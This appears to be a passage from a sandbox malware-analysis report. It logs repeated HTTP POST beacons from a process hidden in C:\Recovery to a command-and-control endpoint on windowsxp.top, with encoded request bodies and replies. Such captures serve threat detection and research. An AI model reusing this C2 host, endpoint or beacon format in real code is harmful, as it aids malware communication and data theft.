                                                                                                                  Date: Sun, 27 Oct 2024 18:23:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynYsNtUAcFbNWZqp9Laf298rDs92i2uJPXp3SKl7Hybhq75WzzdGoigR%2BJOfaO%2B084oHNb9NwBQlQXOeBemCWv8pFDvzgRZZrtG7hcdbpRb7ApeoznmbVaTa5fSuLwfU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b725a8bfe7f7-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1136&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1337026&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.449816188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:07.962234020 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:08.321492910 CET1012OUTData Raw: 55 51 58 55 5e 52 56 51 54 58 57 54 54 56 5b 53 59 51 5b 5d 52 57 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQXU^RVQTXWTTV[SYQ[]RWRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'> )*6/.$_$8W-.,*871#,7*<-/!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:08.576694965 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:08.875416040 CET766INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJ9R9u9GDiTZGdNditVHNIrvXZLqemU4fB7FKlRM67JuaVtV59rNCKfSNwV9OVdsjBhxHL39oqR3Ko01AA8tLtBqKK7rxEWrFHviq9TWAacRonNR0u0MkRpXdacnEpoV"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b72e390d0c27-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.449818188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:08.513313055 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:08.872344971 CET1716OUTData Raw: 55 50 58 55 5e 5a 56 57 54 58 57 54 54 50 5b 5f 59 5a 5b 5e 52 54 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPXU^ZVWTXWTTP[_YZ[^RTRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'& 9)"%#-B038',>T*/V#!';?Z*,=-?!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:09.108038902 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:09.424334049 CET917INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuDQ6o8xMRWbXLVgkozGG8%2BegXI9zRiQyuYI7sencsQ7gxk%2BGkbIvwuaiYTeISXweu%2FyWwqAHuejL3aIb7Bfmdmzs8bFNH%2FjsznGu83HcLvHSwDY5PmQRyU7PghWw8ob"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7318bd8e75a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1816&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=695485&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 14 22 2e 3c 57 2a 05 21 50 2a 1f 2d 5e 30 02 29 5a 3b 32 0d 07 28 2d 32 0f 3a 2b 2d 0d 27 1d 2a 1b 29 39 24 12 23 3d 30 53 3e 35 21 5e 00 1c 27 17 22 58 31 50 25 05 30 5c 24 23 2c 5c 21 2d 2b 15 3d 00 21 1d 3f 5f 27 06 28 16 0d 52 3b 06 3e 0f 31 17 00 12 2c 06 36 5f 28 10 2a 54 0c 14 21 11 2d 3f 19 07 35 31 21 52 29 1c 20 1e 27 00 2b 0a 27 03 23 0e 3c 2c 0a 01 2b 03 3a 00 21 02 05 04 2b 16 21 07 27 03 3c 05 2b 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a
                                                                                                                  Data Ascii: 98"".<W*!P*-^0)Z;2(-2:+-'*)9$#=0S>5!^'"X1P%0\$#,\!-+=!?_'(R;>1,6_(*T!-?51!R) '+'#<,+:!+!'<+."T")S0YP
                                                                                                                  Oct 27, 2024 19:23:09.424350023 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.449824188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:09.007421970 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:09.352454901 CET1008OUTData Raw: 50 57 58 5d 5e 5a 56 52 54 58 57 54 54 55 5b 5b 59 5d 5b 5b 52 53 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX]^ZVRTXWTTU[[Y][[RSRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1<_6:!$[-'?'8$V/=8*P4T /[4=,=9?!Y##X('
                                                                                                                  Oct 27, 2024 19:23:09.623476982 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:09.838660002 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDRW5%2F96Coy6vebxbvRv9V%2FaDaJt6k1P0kbxu8XZ60XtGxTSgQL1gDG2ek5WAvn1qDrB1SeNIaSF5%2F6gtrT7nPN0KJfVzffL4d8m7e8U4VzJkIhWbBIf0Fi3%2F3HokDeA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b734b88ee83f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=860368&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.449830188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:09.976233006 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:10.323093891 CET1012OUTData Raw: 50 52 58 55 5e 52 53 54 54 58 57 54 54 52 5b 53 59 5c 5b 5c 52 54 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRXU^RSTTXWTTR[SY\[\RTRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2>/ 9!_!,433;?;,V)Y?4T?_/'_=-9!Y##X(
                                                                                                                  Oct 27, 2024 19:23:10.587162018 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:10.895071030 CET765INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZZfiVOSRd1gDwb3yCJwjalOk2Y19DDfEpiY06p4UPtE8Ca6z7F5ncRqNUBCPcGEGd8CALNspNs4Rl3XHAlpGDb3P8%2BgVL7ptiMzsDa%2FuuekYi6ScOx2Ref8mJaoS0nI"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b73aca86e956-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1108728&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:10.895195961 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.449836188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:11.026158094 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:11.383944035 CET1012OUTData Raw: 50 56 58 5e 5b 5f 56 56 54 58 57 54 54 52 5b 5d 59 5c 5b 58 52 55 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVX^[_VVTXWTTR[]Y\[XRURXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z1/5=\!%89 \$8#8.+=< 1?8?*?=./!Y##X(
                                                                                                                  Oct 27, 2024 19:23:11.624330997 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:11.921108007 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2Fd2p%2FupKY7uals%2FKrywpZwMpU%2FH57l9WtHZnwu3vnonq8DMyLootxTszXjGhlOLRauPMgGsDecusJPFKJxz5QoGT1ONCvjFmADyFJwpi8Kd3DJtcWIdHoOKv%2FDX3VOo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7414ee7a916-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1533&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=977717&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.449842188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:12.045836926 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:12.399913073 CET1012OUTData Raw: 50 56 58 59 5b 59 56 51 54 58 57 54 54 51 5b 52 59 51 5b 51 52 56 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXY[YVQTXWTTQ[RYQ[QRVRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%=06=^55$\9$ Q,.*4T"2;Y-=?/99!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:12.657399893 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:12.973592043 CET773INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1NIQsveQ7VAU6DT%2Fu8q%2FXTDAHBORG5otcMugUSQ1DhhKMrgQ3TzjX5CVFPbs79QA%2BC0RbW79aRl2c4FrieWhVhz36uxlwFXab5wp0jNVFtIpnYo41zahxohgstXHCi6"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b747ba8d3ab5-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1228159&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.449848188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:13.119216919 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:13.591770887 CET1012OUTData Raw: 55 50 58 59 5b 58 56 54 54 58 57 54 54 50 5b 5a 59 5f 5b 5b 52 52 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPXY[XVTTXWTTP[ZY_[[RRR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.'!*=!(_.0Y$<->(W*T#23Y;>7=<9:!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:13.713222027 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:13.930025101 CET771INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rh6iRbFpamiPTzOK%2BTXE8K7W8t339Xo%2BlateRMyRR%2FjV6VEyLahZ6rbJww23dkVQj15abglU8wc8TanRiy94rDaZLo5d80Rf828oeXbWpdPfLaK%2FXEyAh5mk%2FwRcFjmQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b74e5e742cc6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1382&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1081404&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:13.930042028 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.449854188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:14.058545113 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:14.414833069 CET1012OUTData Raw: 50 57 58 58 5e 5c 53 53 54 58 57 54 54 5c 5b 53 59 5e 5b 5e 52 53 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWXX^\SSTXWTT\[SY^[^RSRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1"9^#&_-4X30W;=<>?P4#[/.8>/*^.!Y##X(
                                                                                                                  Oct 27, 2024 19:23:14.727269888 CET1012OUTData Raw: 50 57 58 58 5e 5c 53 53 54 58 57 54 54 5c 5b 53 59 5e 5b 5e 52 53 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWXX^\SSTXWTT\[SY^[^RSRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1"9^#&_-4X30W;=<>?P4#[/.8>/*^.!Y##X(
                                                                                                                  Oct 27, 2024 19:23:14.772861958 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:15.075289965 CET769INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jrjgDzJ%2BQYfBjOiVHuUPapBPyyJL4k5R3lGCZSJrtLBZUHK5ORygpA4IUiMQ1XNFBkNPLOkHh6i%2B786lUBFlabcQys5XvVUMIDx3ZG%2BLIPCczoZ%2FrOfphJqSCgqj3zAb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b754490b46e6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1260&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1147385&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:15.075309038 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.449860188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:14.773761034 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
